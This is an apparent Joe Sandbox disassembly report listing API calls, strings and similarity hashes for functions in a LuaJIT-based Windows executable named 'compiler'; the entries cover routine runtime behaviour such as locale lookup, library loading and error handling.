                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CurrentHandleProcess$CloseDuplicateFeaturePresentProcessor
                                                            • String ID: /c $COMSPEC$cmd.exe
                                                            • API String ID: 632925573-3246030452
                                                            • Opcode ID: 8d2b322c5374be40a0632b21b4bb372176ec98587ea022fe7186ac17bf430374
                                                            • Instruction ID: ad84f24f3670f37b8f2fa1932686cb4ba3b3b695aebbd2f3141e8d37057612aa
                                                            • Opcode Fuzzy Hash: 8d2b322c5374be40a0632b21b4bb372176ec98587ea022fe7186ac17bf430374
                                                            • Instruction Fuzzy Hash: 7D91B222A0974291FB50BB2994403B9A391FB66B98FC44675EF1D47BDDDE3CD4068320
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • strrchr.LIBVCRUNTIME ref: 00007FF7BADC2F82
                                                              • Part of subcall function 00007FF7BADC3078: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC30B6
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC2E69
                                                              • Part of subcall function 00007FF7BADB6D18: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADB6D3D
                                                              • Part of subcall function 00007FF7BADBEEA0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADBEEC8
                                                              • Part of subcall function 00007FF7BADB76B0: HeapFree.KERNEL32(?,?,?,00007FF7BADC6C64,?,?,?,00007FF7BADC6FE7,?,?,00000019,00007FF7BADC7754,?,?,?,00007FF7BADC7687), ref: 00007FF7BADB76C6
                                                              • Part of subcall function 00007FF7BADB76B0: GetLastError.KERNEL32(?,?,?,00007FF7BADC6C64,?,?,?,00007FF7BADC6FE7,?,?,00000019,00007FF7BADC7754,?,?,?,00007FF7BADC7687), ref: 00007FF7BADB76D8
                                                            • strrchr.LIBVCRUNTIME ref: 00007FF7BADC2EAE
                                                            • strrchr.LIBVCRUNTIME ref: 00007FF7BADC2EBE
                                                            • strrchr.LIBVCRUNTIME ref: 00007FF7BADC2EE2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfostrrchr$ErrorFreeHeapLast
                                                            • String ID: .com
                                                            • API String ID: 1282697220-4200470757
                                                            • Opcode ID: 157fd3c74ecc408e9b2e6992929adf48258491eb38933be4c0eb02aee2cb33dc
                                                            • Instruction ID: 9a1b3fc396619bf4960b855584a71456c71f269dae029545080f0277d2130675
                                                            • Opcode Fuzzy Hash: 157fd3c74ecc408e9b2e6992929adf48258491eb38933be4c0eb02aee2cb33dc
                                                            • Instruction Fuzzy Hash: 2751A011B0934655FA58BA2E98012BAD285DF66FD0FC845B4EF1D577CEFE3CE40192A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                            • String ID:
                                                            • API String ID: 3939093798-0
                                                            • Opcode ID: 189152ba568f8f91c13721ed574b7a3044cfb81d2835aac33a6fae3b97058e20
                                                            • Instruction ID: 9b75f044faacbf71c04e8e47da24b853713cebb8efb7e3d3d2d9b7825925f4cd
                                                            • Opcode Fuzzy Hash: 189152ba568f8f91c13721ed574b7a3044cfb81d2835aac33a6fae3b97058e20
                                                            • Instruction Fuzzy Hash: 05716B62F08602A9FB11BB68D450ABDA3A0FB6AB44FC44575CF0D5369DEF3CA445C7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 1405656091-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite$Console
                                                            • String ID:
                                                            • API String ID: 786612050-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: gfffffff
                                                            • API String ID: 3215553584-1523873471
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: InfoLocaletry_get_function
                                                            • String ID: GetLocaleInfoEx
                                                            • API String ID: 2200034068-2904428671
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID: system error %d
                                                            • API String ID: 3479602957-1688351658
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00007FF7BADB90F8: GetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB9107
                                                              • Part of subcall function 00007FF7BADB90F8: SetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB91A5
                                                            • GetLocaleInfoW.KERNEL32 ref: 00007FF7BADC85E0
                                                              • Part of subcall function 00007FF7BADC71D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC71F8
                                                            • GetLocaleInfoW.KERNEL32 ref: 00007FF7BADC8629
                                                              • Part of subcall function 00007FF7BADC71D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC72AD
                                                            • GetLocaleInfoW.KERNEL32 ref: 00007FF7BADC86F4
                                                            Similarity
                                                            • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3644580040-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: try_get_function
                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                            • API String ID: 2742660187-595813830
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00007FF7BADB90F8: GetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB9107
                                                              • Part of subcall function 00007FF7BADB90F8: SetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB91A5
                                                            • GetLocaleInfoW.KERNEL32 ref: 00007FF7BADC8828
                                                            Similarity
                                                            • API ID: ErrorLast$InfoLocale
                                                            • String ID:
                                                            • API String ID: 3736152602-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00007FF7BADB90F8: GetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB9107
                                                              • Part of subcall function 00007FF7BADB90F8: SetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB91A5
                                                            • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7BADC8BF7,?,00000001,?,00000000,?,00000000,?,00007FF7BADB5BF0), ref: 00007FF7BADC84AA
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2417226690-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00007FF7BADB90F8: GetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB9107
                                                              • Part of subcall function 00007FF7BADB90F8: SetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB91A5
                                                            • GetLocaleInfoW.KERNEL32(?,?,?,00007FF7BADC8771), ref: 00007FF7BADC89FF
                                                            Similarity
                                                            • API ID: ErrorLast$InfoLocale
                                                            • String ID:
                                                            • API String ID: 3736152602-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00007FF7BADB90F8: GetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB9107
                                                              • Part of subcall function 00007FF7BADB90F8: SetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB91A5
                                                            • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7BADC8BB3,?,00000001,?,00000000,?,00000000,?,00007FF7BADB5BF0), ref: 00007FF7BADC855A
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2417226690-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7BADB7B59,?,?,?,?,?,?,?,?,00000000,00007FF7BADC7A58), ref: 00007FF7BADB7767
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID: EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2099609381-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB81CF
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB81EE
                                                              • Part of subcall function 00007FF7BADB7794: GetProcAddress.KERNEL32(?,?,0000000100000002,00007FF7BADB7C72,?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D), ref: 00007FF7BADB78EC
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB820D
                                                              • Part of subcall function 00007FF7BADB7794: LoadLibraryW.KERNELBASE(?,?,0000000100000002,00007FF7BADB7C72,?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D), ref: 00007FF7BADB7837
                                                              • Part of subcall function 00007FF7BADB7794: GetLastError.KERNEL32(?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D,?,?,?,?,00007FF7BADBE8F3), ref: 00007FF7BADB7845
                                                              • Part of subcall function 00007FF7BADB7794: LoadLibraryExW.KERNEL32(?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D,?,?,?,?,00007FF7BADBE8F3), ref: 00007FF7BADB7887
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB822C
                                                              • Part of subcall function 00007FF7BADB7794: FreeLibrary.KERNEL32(?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D,?,?,?,?,00007FF7BADBE8F3), ref: 00007FF7BADB78C0
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB824B
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB826A
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB8289
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB82A8
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB82C7
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB82E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                            • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                            • API String ID: 3255926029-3252031757
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID: wcsftime
                                                            • String ID: !$day$hour$isdst$min$month$sec$wday$yday$year
                                                            • API String ID: 2902305603-306814458
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2936579111-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID: strrchr
                                                            • String ID: 'module' not called from a Lua function$'package.loaders' must be a table$_LOADED$_NAME$_PACKAGE$loaders$loop or previous error loading module '%s'$module '%s' not found:%s
                                                            • API String ID: 3418686817-4002959293
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                            • API String ID: 3215553584-2617248754
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                                                            • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                                                            • API String ID: 4260375681-184456188
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: -$f$p$p
                                                            • API String ID: 3215553584-2516539321
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                            • String ID: gdi32.dll$kernel32.dll$user32.dll
                                                            • API String ID: 384173800-3744471378
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$CloseHandle$CreateErrorLastPipe_get_daylight
                                                            • String ID:
                                                            • API String ID: 1948035671-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: r$w$w
                                                            • API String ID: 3215553584-72812343
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: "%s":%d$%p:%d$%s:%d$builtin:%s
                                                            • API String ID: 2941638530-71741676
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorLast$_cwprintf_s_l$FormatLibraryLoadMessage
                                                            • String ID: %s.dll$cannot load module '%s': %s
                                                            • API String ID: 1337525512-4289185444
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                            • String ID: CONOUT$
                                                            • API String ID: 3230265001-3130406586
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: "$cosh
                                                            • API String ID: 1156100317-3800341493
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _get_daylight.LIBCMT ref: 00007FF7BADC1173
                                                              • Part of subcall function 00007FF7BADC0A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC0A40
                                                            • _get_daylight.LIBCMT ref: 00007FF7BADC1184
                                                              • Part of subcall function 00007FF7BADC09CC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC09E0
                                                            • _get_daylight.LIBCMT ref: 00007FF7BADC1195
                                                              • Part of subcall function 00007FF7BADC09FC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC0A10
                                                              • Part of subcall function 00007FF7BADB76B0: HeapFree.KERNEL32(?,?,?,00007FF7BADC6C64,?,?,?,00007FF7BADC6FE7,?,?,00000019,00007FF7BADC7754,?,?,?,00007FF7BADC7687), ref: 00007FF7BADB76C6
                                                              • Part of subcall function 00007FF7BADB76B0: GetLastError.KERNEL32(?,?,?,00007FF7BADC6C64,?,?,?,00007FF7BADC6FE7,?,?,00000019,00007FF7BADC7754,?,?,?,00007FF7BADC7687), ref: 00007FF7BADB76D8
                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7BADC13C9), ref: 00007FF7BADC11BC
                                                            Strings
                                                            Similarity
                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                            • String ID: ?
                                                            • API String ID: 3458911817-1684325040
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: %s%s$align$line$pragma
                                                            • API String ID: 2941638530-805442268
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ContextException$CaptureDestructEntryFunctionLookupObjectRaiseRestoreUnwind
                                                            • String ID: CCG $csm
                                                            • API String ID: 616248213-2763669848
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: luaJIT_BC_%s$luaopen_%s$path too long
                                                            • API String ID: 1029625771-1241789697
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: %s at line %d$char(%d)
                                                            • API String ID: 2941638530-3672627310
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADBB3B5
                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333,?,?,FFFFFFFE,00007FF7BADBB71E), ref: 00007FF7BADBB474
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333,?,?,FFFFFFFE,00007FF7BADBB71E), ref: 00007FF7BADBB4F4
                                                            Similarity
                                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2210144848-0
                                                            • Opcode ID: b6d45702f668699fd82a6bc176a3cbcd71ef6015d1b29c91b7a2486a46dc003c
                                                            • Instruction ID: a0d4af17e2058729a44b169482ef54fba98996b38e68a5eaa480816ab65fac40
                                                            • Opcode Fuzzy Hash: b6d45702f668699fd82a6bc176a3cbcd71ef6015d1b29c91b7a2486a46dc003c
                                                            • Instruction Fuzzy Hash: ED819F22E1875265FB10BB6D95902BCA6A0FB66784FC44275EF0E1379DDE3CA441C320
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: 12adca675967658979367eabfb8a734187339238eb457c3420354a8a15eeb906
                                                            • Instruction ID: 473410c97d4627c34b9c5ff9b113ae256e5aab23eedaf1b3619104213aec6716
                                                            • Opcode Fuzzy Hash: 12adca675967658979367eabfb8a734187339238eb457c3420354a8a15eeb906
                                                            • Instruction Fuzzy Hash: 3651C422908A4665F662BE3C945077AE2A1FF62350FC482B9FF5E175DCEF3CE4418620
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: strstr
                                                            • String ID: '<eof>'$=stdin$error calling 'print' (%s)$print
                                                            • API String ID: 1392478783-2704460267
                                                            • Opcode ID: 213a096331f9803102432aa97e13902e4b357acc0f52f1d92bba3a7f6f692b58
                                                            • Instruction ID: f7fcfa34743b757525aca417d42aed5dccac812da9028c4639986d22ce3d39c5
                                                            • Opcode Fuzzy Hash: 213a096331f9803102432aa97e13902e4b357acc0f52f1d92bba3a7f6f692b58
                                                            • Instruction Fuzzy Hash: 5C416911F0C95241FA14F72EAA512BD92A2DFA7BD0FC042B0EF1D1B6DEDE3CA5024661
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                            • Instruction ID: 6a71141cc6c7b7a72f8a2e235e017ca68fdb66b0db4006c213db286da550b8bf
                                                            • Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                            • Instruction Fuzzy Hash: 70113766E1CB8321F659362CA4423759150EF7A374FC406B4FFEE062DE8E1CAC418124
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7BAD57DD9,?,?,?,00007FF7BAD57393), ref: 00007FF7BAD57C7A
                                                            • GetModuleHandleA.KERNEL32(?,?,?,00007FF7BAD57DD9,?,?,?,00007FF7BAD57393), ref: 00007FF7BAD57C82
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7BAD57DD9,?,?,?,00007FF7BAD57393), ref: 00007FF7BAD57C93
                                                            • GetModuleHandleExA.KERNEL32(?,?,?,00007FF7BAD57DD9,?,?,?,00007FF7BAD57393), ref: 00007FF7BAD57CB0
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7BAD57DD9,?,?,?,00007FF7BAD57393), ref: 00007FF7BAD57CC2
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID:
                                                            • API String ID: 667068680-0
                                                            • Opcode ID: 218c4462ff4f5f4f61d90a0ddfa3851b511cca9bfdc4549e6f0db9f50f612a47
                                                            • Instruction ID: 9dff5d65606a6aa03af7a9dcbc56b3b3f6c7c91186a4d1c9646baf17f3634581
                                                            • Opcode Fuzzy Hash: 218c4462ff4f5f4f61d90a0ddfa3851b511cca9bfdc4549e6f0db9f50f612a47
                                                            • Instruction Fuzzy Hash: A5F0A460609A4291FE44BB59E544279E360FF5ABC0BD80878DF1E0675CEF2CD014C3A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: 016bd4abb82d9b53c550d9874fae25368a291ec228e867b8fc9ac5df5330fa95
                                                            • Instruction ID: 3aae1f200cd0449d878df00917b5e68644ae4eaa25a62432d8f970ea272bd4dd
